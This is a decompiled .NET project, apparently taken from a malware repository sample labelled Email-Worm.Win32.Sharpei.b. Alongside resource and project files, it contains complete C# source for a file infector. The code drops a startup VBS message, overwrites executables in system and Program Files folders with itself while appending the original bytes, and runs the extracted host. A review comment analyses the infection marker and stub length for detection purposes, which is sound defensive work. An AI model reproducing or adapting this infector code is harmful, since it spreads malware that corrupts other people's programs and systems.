<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<data name="$this.Name" mimetype="application/x-microsoft.net.object.binary.base64">
<value>BUZvcm0x</value>
</data>
</root>
@@ -0,0 +1,13 @@
using System.Reflection;
[assembly: AssemblyCopyright("")]
[assembly: AssemblyKeyFile("")]
[assembly: AssemblyDelaySign(false)]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyKeyName("")]
[assembly: AssemblyProduct("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyTitle("")]
[assembly: AssemblyVersion("1.0.786.1197")]
@@ -0,0 +1,43 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.Win32.Sharpei.b-ba994d47dbed6b77d6a39746bae626cc7cace4153e6108ee5e22a375dc335b84.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{3AB86921-A569-4B25-8BDA-B5539F274189}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>Sharp</AssemblyName>
<ApplicationVersion>1.0.786.1197</ApplicationVersion>
<RootNamespace>Sharp</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
</ItemGroup>
<ItemGroup>
<Compile Include="Sharp.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="Sharp.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Sharp", "Email-Worm.Win32.Sharpei.b-ba994d47dbed6b77d6a39746bae626cc7cace4153e6108ee5e22a375dc335b84.csproj", "{3AB86921-A569-4B25-8BDA-B5539F274189}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{3AB86921-A569-4B25-8BDA-B5539F274189}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{3AB86921-A569-4B25-8BDA-B5539F274189}.Debug|Any CPU.Build.0 = Debug|Any CPU
{3AB86921-A569-4B25-8BDA-B5539F274189}.Release|Any CPU.ActiveCfg = Release|Any CPU
{3AB86921-A569-4B25-8BDA-B5539F274189}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
@@ -0,0 +1,86 @@
// Decompiled with JetBrains decompiler
// Type: Sharp.Sharp
// Assembly: Sharp, Version=1.0.786.1197, Culture=neutral, PublicKeyToken=null
// MVID: C5414447-1586-4206-9133-31D57E99CDF8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.Win32.Sharpei.b-ba994d47dbed6b77d6a39746bae626cc7cace4153e6108ee5e22a375dc335b84.exe
using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;
namespace Sharp
{
public class Sharp
{
private static string virname = (string) Registry.LocalMachine.OpenSubKey("Software\\Sharp").GetValue("");
[STAThread]
private static void Main()
{
StreamWriter text = new FileInfo(new DirectoryInfo(Environment.GetFolderPath(Environment.SpecialFolder.Startup)).FullName + "\\Sharp.vbs").CreateText();
text.Write("MsgBox \"You're infected with Win32.HLLP.Sharp, written in C#, by Gigabyte/Metaphase\",64,\"title\"");
text.Close();
string fullName = new DirectoryInfo(Environment.SystemDirectory).Parent.FullName;
string[] directories = Directory.GetDirectories(new DirectoryInfo(Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles)).FullName, "*.*");
Sharp.Sharp.FileSearch(fullName);
Sharp.Sharp.FileSearch(directories[11]);
Sharp.Sharp.FileSearch(directories[12]);
Sharp.Sharp.FileSearch(directories[13]);
FileStream fileStream1 = new FileStream(Sharp.Sharp.virname, FileMode.Open, FileAccess.Read);
FileStream fileStream2 = new FileStream("temp.exe", FileMode.OpenOrCreate);
byte[] buffer = new byte[(int) checked ((uint) unchecked ((int) fileStream1.Length - 12288))];
fileStream1.Seek(12288L, SeekOrigin.Begin);
fileStream1.Read(buffer, 0, (int) fileStream1.Length - 12288);
fileStream2.Write(buffer, 0, (int) fileStream1.Length - 12288);
long length = fileStream2.Length;
fileStream2.Close();
if (length > 0L && !Sharp.Sharp.virname.EndsWith("MS02-010.exe"))
new Process() { StartInfo = { FileName = "temp.exe" } }.Start();
while (File.Exists("temp.exe"))
{
try
{
File.Delete("temp.exe");
}
catch
{
}
}
}
private static void FileSearch(string DirectoryToCheck)
{
string[] files = Directory.GetFiles(DirectoryToCheck, "*.exe");
int length = files.Length;
for (int index = 0; index < length; ++index)
{
string str = files[index];
FileStream fileStream1 = new FileStream(str, FileMode.Open, FileAccess.Read);
fileStream1.Seek(18L, SeekOrigin.Begin);
int num = fileStream1.ReadByte();
fileStream1.Close();
if (num != 103)
{
try
{
File.SetAttributes(str, FileAttributes.Normal);
File.Copy(str, "hostcopy.exe", true);
File.Copy(Sharp.Sharp.virname, str, true);
FileStream fileStream2 = new FileStream("hostcopy.exe", FileMode.Open);
FileStream fileStream3 = new FileStream(str, FileMode.Append);
byte[] buffer = new byte[(int) checked ((uint) unchecked ((int) fileStream2.Length))];
fileStream2.Read(buffer, 0, (int) fileStream2.Length);
fileStream3.Write(buffer, 0, (int) fileStream2.Length);
fileStream2.Close();
fileStream3.Close();
}
catch
{
}
}
}
File.Delete("hostcopy.exe");
}
}
}
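Review bot: The constants 12288, 18 and 103 in `Main` and `FileSearch` are unexplained, and they are what a detection or cleanup rule for this file infector would be built on. From the visible code, `FileSearch` skips any .exe whose byte at offset 18 is 103 and otherwise overwrites the file with the one named by `virname` and appends the original bytes, while `Main` copies everything after offset 12288 of `virname` to temp.exe and starts it; so 103 at offset 18 looks like the infection marker and 12288 the length of the prepended stub, though neither is confirmed here. Suggested comments: `// offset 18 == 103 (0x67): presumed infection marker, verify against the binary` next to the `ReadByte` check and `// 12288: presumed stub length; original host bytes start at this offset` next to the `Seek`. A header comment should also record the other artefacts the code shows: Sharp.vbs written to the Startup folder, the default value of HKLM\Software\Sharp read into `virname`, and the hostcopy.exe and temp.exe working files in the current directory.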
@@ -0,0 +1,120 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>